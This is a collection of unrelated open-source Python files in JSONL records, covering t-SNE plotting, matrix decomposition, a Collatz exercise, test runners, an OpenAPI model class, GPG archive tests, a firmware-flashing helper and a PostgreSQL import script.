data.append(origin_data[ei])\n print(target)\n X_tsne = TSNE(n_components=2, random_state=33).fit_transform(data)\n # X_pca = PCA(n_components=2).fit_transform(digits.data)\n\n ckpt_dir = \"images\"\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n plt.figure(figsize=(5, 5))\n plt.title(\"{}[use_sample={}]\".format(path, str(use_sample)))\n # plt.subplot(121)\n plt.scatter(X_tsne[:, 0], X_tsne[:, 1], s=[8] * len(target), c=target, label=\"t-SNE\", cmap=\"Oranges\")\n plt.legend()\n # plt.subplot(122)\n # plt.scatter(X_pca[:, 0], X_pca[:, 1], c=digits[\"target\"], label=\"PCA\")\n # plt.legend()\n plt.savefig(\"images/inter-5-1.png\", dpi=120)\n plt.show()\n\n\nif __name__ == \"__main__\":\n load_data_and_draw(False)\n # digits = load_digits()\n # X_tsne = TSNE(n_components=2,random_state=33).fit_transform(digits.data)\n # X_pca = PCA(n_components=2).fit_transform(digits.data)\n #\n # ckpt_dir=\"images\"\n # if not os.path.exists(ckpt_dir):\n # os.makedirs(ckpt_dir)\n #\n # plt.figure(figsize=(10, 5))\n # plt.subplot(121)\n # plt.scatter(X_tsne[:, 0], X_tsne[:, 1], c=digits.target,label=\"t-SNE\")\n # plt.legend()\n # plt.subplot(122)\n # plt.scatter(X_pca[:, 0], X_pca[:, 1], c=digits.target,label=\"PCA\")\n # plt.legend()\n # plt.savefig(\"images/inter-5-1.png\", dpi=120)\n # plt.show()\n","repo_name":"HugAILab/HugNLP","sub_path":"processors/ner/fewshot_ner/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"33190222067","text":"\"\"\"Tools for matrix decomposition and power.\"\"\"\nimport numpy as np\n\n\ndef eigh(matrix, threshold=1e-9):\n \"\"\"Return the eigenvalues and eigenvectors of a Hermitian matrix.\n\n Eigenvalues whose absolute values are less than the threshold are discarded as well as the\n corresponding eigenvectors.\n\n Parameters\n ----------\n matrix : np.ndarray(N, N)\n Square Hermitian matrix.\n threshold : {1e-9, float}\n Eigenvalues (and corresponding eigenvectors) below this threshold are discarded.\n\n Returns\n -------\n eigval : np.ndarray(K,)\n Eigenvalues sorted in decreasing order.\n eigvec : np.ndarray(N,K)\n Matrix where the columns are the corresponding eigenvectors to the eigval.\n\n Raises\n ------\n TypeError\n If `matrix` is not a two-dimensional numpy array.\n If `threshold` is not an integer or a float.\n ValueError\n If `matrix` is not a square matrix.\n If `matrix` is not Hermitian.\n If `threshold` is negative.\n\n Warns\n -----\n If there are any negative eigenvalues (beyond the given threshold).\n If any eigenvalues and eigenvectors are discarded.\n\n Note\n ----\n This code mainly uses numpy.eigh\n\n \"\"\"\n if not (isinstance(matrix, np.ndarray) and matrix.ndim == 2):\n raise TypeError(\"Given matrix must be a two-dimensional numpy array.\")\n if matrix.shape[0] != matrix.shape[1]:\n raise ValueError(\"Given matrix must be square.\")\n if not np.allclose(matrix.conjugate().T, matrix):\n raise ValueError(\"Given matrix must be Hermitian.\")\n if not isinstance(threshold, (int, float)):\n raise TypeError(\"Given threshold must be an integer or a float.\")\n if threshold < 0:\n raise ValueError(\"Given threshold must be positive.\")\n\n eigval, eigvec = np.linalg.eigh(matrix)\n # NOTE: it is assumed that the np.linalg.eigh sorts the eigenvalues in increasing order.\n\n neg_indices = eigval < -threshold\n if np.any(neg_indices):\n print((\n \"WARNING: {0} eigenvalues are negative (less than the threshold {1}):\\n\"\n \"{2}\".format(np.sum(neg_indices), -threshold, eigval[neg_indices])\n ))\n\n kept_indices = np.abs(eigval) > threshold\n if np.sum(~kept_indices) > 0:\n print((\n \"WARNING: Discarded {0} eigenvalues because they are less than the threshold {1}:\\n\"\n \"{2}\".format(np.sum(~kept_indices), threshold, eigval[~kept_indices])\n ))\n\n eigval, eigvec = eigval[kept_indices], eigvec[:, kept_indices]\n return eigval[::-1], eigvec[:, ::-1]\n\n\ndef svd(matrix, threshold=1e-9):\n \"\"\"Return the singular values and singular vectors of the given matrix.\n\n Singular values whose absolute values are less than the threshold are discarded as well as the\n corresponding singular vectors.\n\n\n Parameters\n ----------\n matrix : np.ndarray(N, M)\n Matrix.\n threshold : {1e-9, float}\n Singular values (and corresponding singular vectors) below this threshold are discarded.\n\n Returns\n -------\n u : np.ndarray(N, K)\n Left singular matrix.\n sigma : np.ndarray(K,)\n Singular values sorted in decreasing order.\n vdagger : np.ndarray(K, M)\n Right singular matrix.\n\n Raises\n ------\n TypeError\n If `matrix` is not a two-dimensional numpy array.\n\n Warns\n -----\n If any singular values and singular vectors are discarded.\n\n Note\n ----\n This code uses numpy.linalg.svd\n\n \"\"\"\n # pylint: disable=C0103\n if not (isinstance(matrix, np.ndarray) and matrix.ndim == 2):\n raise TypeError(\"Given matrix must be a two-dimensional numpy array.\")\n\n u, sigma, vdagger = np.linalg.svd(matrix, full_matrices=False)\n # NOTE: it is assumed that the np.linalg.svd sorts the singular values in descending order.\n\n kept_indices = sigma > threshold\n if np.sum(~kept_indices) > 0:\n print((\n \"WARNING: Discarded {0} singular values because they are less than the threshold {1}:\\n\"\n \"{2}\".format(np.sum(~kept_indices), threshold, sigma[~kept_indices])\n ))\n\n u, sigma, vdagger = u[:, kept_indices], sigma[kept_indices], vdagger[kept_indices, :]\n\n return u, sigma, vdagger\n\n\ndef power_symmetric(matrix, k, threshold=1e-9):\n \"\"\"Return the kth power of the given symmetric matrix.\n\n Parameters\n ----------\n matrix : np.ndarray(N, N)\n Symmetric matrix.\n k : {int, float}\n Power of the matrix.\n threshold : {1e-9, float}\n In the eigenvalue decomposition, the eigenvalues (and corresponding eigenvectors) that are\n less than the threshold are discarded.\n\n Returns\n -------\n matrix_power : np.ndarray(N, N)\n Matrix raised to the kth power.\n\n Raises\n ------\n ValueError\n If the `k` is a fraction and matrix has negative eigenvalues.\n\n \"\"\"\n eigval, eigvec = eigh(matrix, threshold=threshold)\n if k % 1 != 0 and np.any(eigval < 0):\n raise ValueError(\n \"Given matrix has negative eigenvalues. Fractional powers of negative eigenvalues are \"\n \"not supported.\"\n )\n return (eigvec * (eigval ** k)).dot(eigvec.T)\n","repo_name":"theochem/chemtools","sub_path":"chemtools/orbstools/orthogonalization.py","file_name":"orthogonalization.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"17592803133","text":"# Luisa Timothy 10-02-2018\r\n# Collaz conjecture \r\n\r\nn = 1984\r\n\r\nwhile n !=1: # as long as n is not 1\r\n if n % 2 == 0: # if n modulus 2 exactly equals 0, meaning if n is an even number, divide by two\r\n n = n // 2 # then n is n divided by two returning an integer, not a floating point\r\n print (n) # output result\r\n else: # if n is not even then multiply by three and add 1\r\n n = n * 3 + 1 # n is n times 3 plus 1\r\n print (n) # output result\r\n\r\nprint (\"the final value of n is\", n) # final result will always be 1","repo_name":"Luisa-T/helloworld","sub_path":"CollatzLuTi.py","file_name":"CollatzLuTi.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9342209880","text":"\"\"\"\nThis allows you to run a specific test function by itself from an importable module.\n\nThe function can be either a method of a unittest.TestCase subclass, or just a function defined\nat module level. This is useful when running an individual test under mpirun for debugging\npurposes.\n\nTo specify the test to run, use the following forms:\n\n:. OR :\n\nwhere is either the dotted module name or the full filesystem path of the python file.\n\nfor example:\n\n mpirun -n 4 run_test mypackage.mysubpackage.mymod:MyTestCase.test_foo\n\n OR\n\n mpirun -n 4 run_test /foo/bar/mypackage/mypackage/mysubpackage/mymod.py:MyTestCase.test_foo\n\"\"\"\n\nimport os\nimport sys\nimport importlib\nfrom openmdao.utils.file_utils import get_module_path\n\n\ndef run_test():\n \"\"\"\n Run individual test(s).\n \"\"\"\n if len(sys.argv) > 1:\n testspec = sys.argv[1]\n parts = testspec.split(':')\n\n if len(sys.argv) != 2 or len(parts) != 2:\n print('Usage: run_test my_mod_path:my_test_case.test_func_name\\n'\n ' OR\\n'\n ' run_test my_mod_path:test_func_name')\n sys.exit(-1)\n\n modpath, funcpath = parts\n if modpath.endswith('.py'):\n modpath = get_module_path(modpath)\n if modpath is None:\n modpath = parts[0]\n moddir = os.path.dirname(modpath)\n sys.path = [moddir] + sys.path\n modpath = os.path.basename(modpath)[:-3]\n\n mod = importlib.import_module(modpath)\n\n parts = funcpath.split('.', 1)\n if len(parts) == 2:\n tcase_name, method_name = parts\n testcase = getattr(mod, tcase_name)(methodName=method_name)\n setup = getattr(testcase, 'setUp', None)\n if setup is not None:\n setup()\n getattr(testcase, method_name)()\n teardown = getattr(testcase, 'tearDown', None)\n if teardown:\n teardown()\n else:\n funcname = parts[0]\n getattr(mod, funcname)()\n\n\nif __name__ == '__main__':\n run_test()\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/devtools/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"22107134238","text":"# coding: utf-8\n\n\"\"\"\n fatcat\n\n Fatcat is a scalable, versioned, API-oriented catalog of bibliographic entities and file metadata. # noqa: E501\n\n The version of the OpenAPI document: 0.3.1\n Contact: webservices@archive.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass ReleaseRef(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'index': 'int',\n 'target_release_id': 'str',\n 'extra': 'dict(str, object)',\n 'key': 'str',\n 'year': 'int',\n 'container_name': 'str',\n 'title': 'str',\n 'locator': 'str'\n }\n\n attribute_map = {\n 'index': 'index',\n 'target_release_id': 'target_release_id',\n 'extra': 'extra',\n 'key': 'key',\n 'year': 'year',\n 'container_name': 'container_name',\n 'title': 'title',\n 'locator': 'locator'\n }\n\n def __init__(self, index=None, target_release_id=None, extra=None, key=None, year=None, container_name=None, title=None, locator=None): # noqa: E501\n \"\"\"ReleaseRef - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._index = None\n self._target_release_id = None\n self._extra = None\n self._key = None\n self._year = None\n self._container_name = None\n self._title = None\n self._locator = None\n self.discriminator = None\n\n if index is not None:\n self.index = index\n if target_release_id is not None:\n self.target_release_id = target_release_id\n if extra is not None:\n self.extra = extra\n if key is not None:\n self.key = key\n if year is not None:\n self.year = year\n if container_name is not None:\n self.container_name = container_name\n if title is not None:\n self.title = title\n if locator is not None:\n self.locator = locator\n\n @property\n def index(self):\n \"\"\"Gets the index of this ReleaseRef. # noqa: E501\n\n Zero-indexed sequence number of this reference in the list of references. Assigned automatically and used internally; don't confuse with `key`. # noqa: E501\n\n :return: The index of this ReleaseRef. # noqa: E501\n :rtype: int\n \"\"\"\n return self._index\n\n @index.setter\n def index(self, index):\n \"\"\"Sets the index of this ReleaseRef.\n\n Zero-indexed sequence number of this reference in the list of references. Assigned automatically and used internally; don't confuse with `key`. # noqa: E501\n\n :param index: The index of this ReleaseRef. # noqa: E501\n :type: int\n \"\"\"\n\n self._index = index\n\n @property\n def target_release_id(self):\n \"\"\"Gets the target_release_id of this ReleaseRef. # noqa: E501\n\n Optional, fatcat identifier of release entity that this reference is citing. # noqa: E501\n\n :return: The target_release_id of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._target_release_id\n\n @target_release_id.setter\n def target_release_id(self, target_release_id):\n \"\"\"Sets the target_release_id of this ReleaseRef.\n\n Optional, fatcat identifier of release entity that this reference is citing. # noqa: E501\n\n :param target_release_id: The target_release_id of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n if target_release_id is not None and len(target_release_id) > 26:\n raise ValueError(\"Invalid value for `target_release_id`, length must be less than or equal to `26`\") # noqa: E501\n if target_release_id is not None and len(target_release_id) < 26:\n raise ValueError(\"Invalid value for `target_release_id`, length must be greater than or equal to `26`\") # noqa: E501\n if target_release_id is not None and not re.search(r'[a-zA-Z2-7]{26}', target_release_id): # noqa: E501\n raise ValueError(r\"Invalid value for `target_release_id`, must be a follow pattern or equal to `/[a-zA-Z2-7]{26}/`\") # noqa: E501\n\n self._target_release_id = target_release_id\n\n @property\n def extra(self):\n \"\"\"Gets the extra of this ReleaseRef. # noqa: E501\n\n Additional free-form JSON metadata about this citation. Generally follows Citation Style Language (CSL) JSON schema. See guide for details. # noqa: E501\n\n :return: The extra of this ReleaseRef. # noqa: E501\n :rtype: dict(str, object)\n \"\"\"\n return self._extra\n\n @extra.setter\n def extra(self, extra):\n \"\"\"Sets the extra of this ReleaseRef.\n\n Additional free-form JSON metadata about this citation. Generally follows Citation Style Language (CSL) JSON schema. See guide for details. # noqa: E501\n\n :param extra: The extra of this ReleaseRef. # noqa: E501\n :type: dict(str, object)\n \"\"\"\n\n self._extra = extra\n\n @property\n def key(self):\n \"\"\"Gets the key of this ReleaseRef. # noqa: E501\n\n Short string used to indicate this reference from within the release text; or numbering of references as typeset in the release itself. Optional; don't confuse with `index` field. # noqa: E501\n\n :return: The key of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._key\n\n @key.setter\n def key(self, key):\n \"\"\"Sets the key of this ReleaseRef.\n\n Short string used to indicate this reference from within the release text; or numbering of references as typeset in the release itself. Optional; don't confuse with `index` field. # noqa: E501\n\n :param key: The key of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._key = key\n\n @property\n def year(self):\n \"\"\"Gets the year of this ReleaseRef. # noqa: E501\n\n Year that the cited work was published in. # noqa: E501\n\n :return: The year of this ReleaseRef. # noqa: E501\n :rtype: int\n \"\"\"\n return self._year\n\n @year.setter\n def year(self, year):\n \"\"\"Sets the year of this ReleaseRef.\n\n Year that the cited work was published in. # noqa: E501\n\n :param year: The year of this ReleaseRef. # noqa: E501\n :type: int\n \"\"\"\n\n self._year = year\n\n @property\n def container_name(self):\n \"\"\"Gets the container_name of this ReleaseRef. # noqa: E501\n\n Name of the container (eg, journal) that the citation work was published as part of. May be an acronym or full name. # noqa: E501\n\n :return: The container_name of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._container_name\n\n @container_name.setter\n def container_name(self, container_name):\n \"\"\"Sets the container_name of this ReleaseRef.\n\n Name of the container (eg, journal) that the citation work was published as part of. May be an acronym or full name. # noqa: E501\n\n :param container_name: The container_name of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._container_name = container_name\n\n @property\n def title(self):\n \"\"\"Gets the title of this ReleaseRef. # noqa: E501\n\n Name of the work being cited. # noqa: E501\n\n :return: The title of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._title\n\n @title.setter\n def title(self, title):\n \"\"\"Sets the title of this ReleaseRef.\n\n Name of the work being cited. # noqa: E501\n\n :param title: The title of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._title = title\n\n @property\n def locator(self):\n \"\"\"Gets the locator of this ReleaseRef. # noqa: E501\n\n Page number or other indicator of the specific subset of a work being cited. Not to be confused with the first page (or page range) of an entire paper or chapter being cited. # noqa: E501\n\n :return: The locator of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._locator\n\n @locator.setter\n def locator(self, locator):\n \"\"\"Sets the locator of this ReleaseRef.\n\n Page number or other indicator of the specific subset of a work being cited. Not to be confused with the first page (or page range) of an entire paper or chapter being cited. # noqa: E501\n\n :param locator: The locator of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._locator = locator\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ReleaseRef):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"internetarchive/fatcat","sub_path":"python_openapi_client/fatcat_openapi_client/models/release_ref.py","file_name":"release_ref.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"30574595082","text":"\"\"\"\nCreated on Sat Jul 26 20:49:41 2018\n\n@author: Ivan A. Maidana\n\"\"\"\n\nimport random\nimport numpy as np\n\nFIGURITAS_PARA_COMPLETAR_EL_ALBUM = 6\nVECES_QUE_SE_COMPLETARON_LOS_ALBUNES = 10\nALBUM_LLENO = np.arange (1, FIGURITAS_PARA_COMPLETAR_EL_ALBUM + 1)\nREGISTRO_DE_LAS_REPETICIONES = []\n\nfor repetir in range (VECES_QUE_SE_COMPLETARON_LOS_ALBUNES):\n def JUGADA (ALBUM):\n COUNT = 0\n while all (ALBUM) != all (ALBUM_LLENO):\n DADO = random.randint (1, FIGURITAS_PARA_COMPLETAR_EL_ALBUM)\n COUNT = COUNT + 1\n if ALBUM [DADO -1] == 0:\n ALBUM [DADO -1] = DADO\n return COUNT\n \n ALBUM_POR_LLENAR = [0] * FIGURITAS_PARA_COMPLETAR_EL_ALBUM\n ALBUM = JUGADA (ALBUM_POR_LLENAR)\n REGISTRO_DE_LAS_REPETICIONES.append (ALBUM)\n\t\nPROMEDIO = np.mean (REGISTRO_DE_LAS_REPETICIONES, dtype = int)\n\ndef CANTIDAD (promedio_obtenido, CANTIDAD_QUE_TIENE_UN_PAQUETE):\n PAQUETES_A_COMPRAR = promedio_obtenido / CANTIDAD_QUE_TIENE_UN_PAQUETE\n return PAQUETES_A_COMPRAR\nPAQUETES_1 = CANTIDAD (PROMEDIO, 5)\nPAQUETES_2 = int (PAQUETES_1)\n\ndef COSTO (PAQUETES_A_COMPRAR, PRECIO_UNIDAD_PAQUETES):\n PESOS_ARG = PAQUETES_A_COMPRAR * PRECIO_UNIDAD_PAQUETES\n return PESOS_ARG\nCOSTO_1 = COSTO (PAQUETES_2, 14)\nCOSTO_2 = int (COSTO_1)\n","repo_name":"Ivan9912/mis-archivos-de-python","sub_path":"Exactas Programa/Programas .py/Ejercicio Album/Promedio album [Sin Editado].py","file_name":"Promedio album [Sin Editado].py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33514124963","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n'''\nCreated on Dec 19, 2013\n\n@author: ejen\n'''\nimport io\nimport unittest\nimport os\nfrom edcore.utils.data_archiver import (import_recipient_keys, archive_files, encrypted_archive_files,\n GPGPublicKeyException, GPGException)\nimport tempfile\nfrom edcore.utils.utils import tar_files\n\n\nclass MockKeyserver():\n\n def __init__(self, keyid, key):\n self.ring = {keyid: key}\n\n def get_key(self, key_id):\n try:\n return self.ring[key_id]\n except Exception:\n return None\n\n def search_key(self, key):\n owners = self.ring.keys()\n if key in owners:\n return [{'keyid': key}]\n else:\n return []\n\n\nclass MockGnuPG():\n\n def __init__(self):\n self.ring = {}\n\n def search_keys(self, recipients, keyserver):\n return keyserver.search_key(recipients)\n\n def list_keys(self):\n return self.ring.values()\n\n def recv_keys(self, keyserver, recipients):\n key = keyserver.get_key(recipients)\n if key is not None:\n self.ring[recipients] = key\n\n\nclass Test_FileUtils(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_import_recipient_keys(self):\n settings = {\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n gpg = MockGnuPG()\n keyserver = MockKeyserver('sbac_data_provider@sbac.com', 'fake key')\n recipients = settings['extract.gpg.public_key.cat']\n import_recipient_keys(gpg, recipients, keyserver)\n self.assertEqual(len(gpg.list_keys()), 1)\n\n def test_archive_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n\n archive_memory_file = io.BytesIO()\n archive_files(dir, archive_memory_file)\n fixture_len = 343\n self.assertEqual(len(archive_memory_file.getvalue()), fixture_len)\n\n def test_tar_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir, tempfile.TemporaryDirectory() as output_dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n output = os.path.join(output_dir, \"test.tar\")\n tar_files(dir, output)\n self.assertNotEqual(os.path.getsize(output), 0)\n\n def test_encrypted_archive_files_public_key_exception(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': 'hello',\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n self.assertRaises(GPGPublicKeyException, encrypted_archive_files, dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg')\n\n def test_encrypted_archive_files_unrecoverable_exception(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': 'hello',\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n self.assertRaises(GPGException, encrypted_archive_files, dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg111')\n\n def test_encrypted_archive_files(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': None,\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n encrypted_archive_files(dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg')\n self.assertTrue(os.path.isfile(outputfile))\n self.assertNotEqual(os.stat(outputfile).st_size, 0)\n\n def test_archive_unencrypted_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n outputfile = os.path.join(dir, 'test_output.zip')\n archive_files(dir, outputfile)\n self.assertTrue(os.path.isfile(outputfile))\n self.assertNotEqual(os.stat(outputfile).st_size, 0)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edcore/edcore/tests/utils/test_data_archiver.py","file_name":"test_data_archiver.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"42103321861","text":"import asyncio\nimport os, sys\nimport subprocess\nimport tempfile\nfrom pathlib import Path\n\nclass download_fw_intf():\n async def download(self, deviceName, firmwareName=None, flashAddr=None):\n dut = self.configDut[deviceName]\n if 'download' not in dut:\n raise AssertionError('Download method is not configured for {}'.format(deviceName))\n\n for d in dut['download']:\n if len(d) <= 1:\n print('download tool {} is not supported yet'.format(d['tool'] if 'tool' in d else d))\n continue\n\n if d['tool'].upper() == 'MDK':\n if os.name != 'nt':\n print('MDK is only supported on Windows')\n continue\n cmd = [d['path'], '-f', str(Path(d['workdir']) / d['project']), '-t', d['target']]\n p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await p.communicate()\n if p.returncode:\n print(f'MDK programmer return code: {p.returncode}')\n print('stdout: ' + stdout.decode())\n print('stderr: ' + stderr.decode())\n continue\n break\n\n if d['tool'].upper() == 'JLINK':\n if not firmwareName:\n firmwareName = d['datafile']\n if not flashAddr:\n flashAddr = d['flash_addr']\n if not isinstance(d['flash_addr'], str):\n flashAddr = '{:x}'.format(d['flash_addr'])\n if flashAddr.startswith('0x'):\n flashAddr = flashAddr[2:]\n\n firmwarePath = Path(\"resources\") / 'test_data' / firmwareName\n if not firmwarePath.exists():\n raise AssertionError(f'Firmware {firmwarePath} not found')\n with tempfile.TemporaryDirectory() as tempDir:\n script = Path(tempDir) / 'download_script.jlink'\n script_contents = (\"r\\n\"\n \"exec EnableEraseAllFlashBanks\\n\"\n \"erase\\n\"\n \"loadbin {} {} SWDSelect\\n\"\n \"verifybin {} {}\\n\"\n \"r\\n\"\n \"g\\n\"\n \"qc\\n\".format(firmwarePath, flashAddr, firmwarePath, flashAddr))\n with open(script, 'w') as f:\n f.write(script_contents)\n cmd = [d['path'], '-device', d['device'], '-if', d['interface'], '-speed', str(d['speed']), '-autoconnect', '1', '-JTAGConf', '-1,-1', '-CommanderScript', str(script)]\n p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await p.communicate()\n if p.returncode:\n print(f'JLINK programmer return code: {p.returncode}')\n print('stdout: ' + stdout.decode())\n print('stderr: ' + stderr.decode())\n continue\n break\n if d['tool'].upper() == 'DAPLINK':\n if not firmwareName:\n firmwareName = d['datafile']\n if not os.path.isabs(firmwareName):\n firmwarePath = Path(\"resources\") / 'test_data' / firmwareName\n cmd = ['pyocd.exe', 'flash', str(firmwarePath), '--probe', '0', '--target', d['target']]\n p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await p.communicate()\n if p.returncode:\n print(f'DAPLINK programmer return code: {p.returncode}')\n print('stdout: ' + stdout.decode())\n print('stderr: ' + stderr.decode())\n continue\n break\n print('Firmware downloading failed by {}, try next tool...'.format(d['tool'].upper()))\n else:\n raise AssertionError('Failed to download the firmware for {}'.format(deviceName))\n","repo_name":"pansila/Auto-Test-System","sub_path":"sample-scripts/robotest_utilities/src/robotest_utilities/download_fw.py","file_name":"download_fw.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"42450829412","text":"import psycopg2\nimport xml.etree.ElementTree as ET\n\nconn = psycopg2.connect(\"dbname=tracks user=postgres password=mayalove\")\ncur = conn.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Artist;\nDROP TABLE IF EXISTS Album;\nDROP TABLE IF EXISTS Track;\n\nCREATE TABLE Artist (\n id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n name TEXT UNIQUE\n);\n\nCREATE TABLE Album (\n id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n artist_id INT,\n title TEXT UNIQUE\n);\n\nCREATE TABLE Track (\n id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n title TEXT,\n album_id INT,\n len INT,\n rating INT,\n count INT\n)\n''')\n\nfilename = input('Input file path: ')\nif len(filename) < 1: filename = 'C:\\projects\\py_learning\\Library.xml'\n\ndef lookup(d, key):\n found = False\n for child in 